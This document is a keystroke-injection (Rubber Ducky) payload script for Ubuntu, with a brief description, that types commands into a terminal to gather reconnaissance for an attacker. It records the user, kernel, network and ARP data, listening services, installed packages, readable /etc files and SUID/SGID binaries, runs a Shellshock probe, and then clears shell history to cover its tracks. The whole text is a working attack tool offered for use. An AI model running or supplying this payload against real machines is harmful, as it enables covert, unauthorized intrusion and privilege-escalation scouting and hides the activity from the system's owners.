The following script is an information gatherer script which collects info from a running Ubuntu OS and saves it to a file named "info_gathering.txt". The info that the script retrieves is the logged in username, the distribution and kernel version of the running system, the applicability of the shellsock bug, the mounted filesystems, information which is related to the Network adapters, availability of development tools (python, g++), contents of the hosts file and the listening TCP/UDP connections. Apart from that it attempts to find readable folders inside the /etc folder and also prints the SUID and GUID files. REM Info gathering Ubuntu 1.0 Script issues OS info gathering commands in terminal - by Captain_Harlock, Improved by Thecakeisgit ;D DELAY 3000 CTRL ALT t DELAY 1500 STRING clear DELAY 10 ENTER DELAY 50 STRING echo "Logged in user: " $USER > info_gathering.txt ENTER DELAY 50 STRING echo >> info_gathering.txt DELAY 50 ENTER DELAY 50 STRING echo -n "Distribution Kernel Version: " >> info_gathering.txt DELAY 50 ENTER DELAY 50 STRING cat /etc/issue | cut -c1-13 >> info_gathering.txt DELAY 50 ENTER DELAY 50 STRING echo -n "uname results: " >> info_gathering.txt DELAY 50 ENTER DELAY 50 STRING uname -a >> info_gathering.txt DELAY 50 ENTER DELAY 100 STRING echo >> info_gathering.txt DELAY 50 ENTER DELAY 50 STRING echo "Shellsock Bug Vulnerability: " >> info_gathering.txt DELAY 50 ENTER DELAY 50 STRING env x='() { :;}; echo vulnerable' bash -c "echo this is a test" >> info_gathering.txt DELAY 50 ENTER DELAY 50 STRING echo >> info_gathering.txt DELAY 50 ENTER DELAY 50 STRING echo >> info_gathering.txt DELAY 50 ENTER DELAY 50 STRING echo "Mounted filesystems: " >> info_gathering.txt ENTER DELAY 50 STRING mount -l >> info_gathering.txt DELAY 50 ENTER DELAY 100 STRING echo >> info_gathering.txt ENTER DELAY 50 STRING echo "Network Configuration: " >> info_gathering.txt DELAY 50 ENTER DELAY 50 STRING ifconfig -a | grep 'Link\|inet' >> info_gathering.txt ENTER DELAY 50 STRING echo >> info_gathering.txt ENTER DELAY 50 STRING echo "Print Hosts: " >> info_gathering.txt ENTER DELAY 50 STRING cat /etc/hosts >> info_gathering.txt ENTER DELAY 50 STRING echo "Print ARP: " >> info_gathering.txt ENTER DELAY 50 STRING arp >> info_gathering.txt ENTER DELAY 50 STRING echo >> info_gathering.txt ENTER DELAY 50 STRING echo "Development tools availability: " >> info_gathering.txt ENTER DELAY 50 STRING which gcc >> info_gathering.txt ENTER DELAY 50 STRING which g++ >> info_gathering.txt ENTER DELAY 50 STRING which python >> info_gathering.txt ENTER DELAY 50 STRING echo >> info_gathering.txt ENTER DELAY 50 STRING echo "Print TCP/UDP Listening Services: " >> info_gathering.txt ENTER DELAY 50 STRING netstat -tunlpe >> info_gathering.txt ENTER DELAY 300 STRING echo >> info_gathering.txt ENTER DELAY 50 STRING echo "Installed Packages: " >> info_gathering.txt DELAY 50 ENTER DELAY 200 STRING dpkg -l >> info_gathering.txt ENTER DELAY 300 STRING echo >> info_gathering.txt ENTER DELAY 50 STRING echo "Find Readable Folders in /etc: " >> info_gathering.txt ENTER DELAY 50 STRING find /etc -user $(id -u) -perm -u=r -o -group $(id -g) -perm -g=r -o -perm -o=r -ls 2> /dev/null >> info_gathering.txt ENTER DELAY 500 STRING echo >> info_gathering.txt ENTER DELAY 50 STRING echo "Find SUID and GUID files" >> info_gathering.txt ENTER DELAY 50 STRING find / -type f -perm -u=s -o -type f -perm -g=s -ls 2> /dev/null >> info_gathering.txt DELAY 50 ENTER DELAY 15000 STRING history -c DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER